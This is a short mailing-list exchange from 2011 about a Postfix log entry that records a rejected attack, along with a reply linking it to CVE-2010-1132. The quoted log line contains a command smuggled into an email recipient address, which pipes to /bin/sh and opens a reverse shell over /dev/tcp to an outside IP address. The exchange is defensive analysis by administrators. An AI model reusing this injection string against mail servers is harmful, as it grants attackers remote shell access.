On Sat, 2011-02-12 at 14:53:53 -0700, Bob Proulx wrote: > A friend's Mac running Postfix logged this rejected attack: > > Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT > from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command > rejected: need fully-qualified hostname; from=<b...@dick.com> > to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> > proto=SMTP helo=<bluedick> > > Of course this particular message was blocked at the HELO stage. But > I was curious as to what attack vector this was trying to exploit and > against what mail transport agent? I searched the web quite a bit and > didn't see this particular attack discussed anywhere. > > Obviously the /dev/tcp/host/port part is trying to connect back to a > C&C host and attach the network connection to a root shell. I > understand the shell scripting part of the attack fine. > > The remote mta security exploit I couldn't locate references to was > the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is > vulnerable to "+:|" in the To address? Or perhaps none are and this > is simply a failed probe attempt?
Likely related to CVE-2010-1132: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1132 http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html -- Sahil Tandon <sa...@freebsd.org>
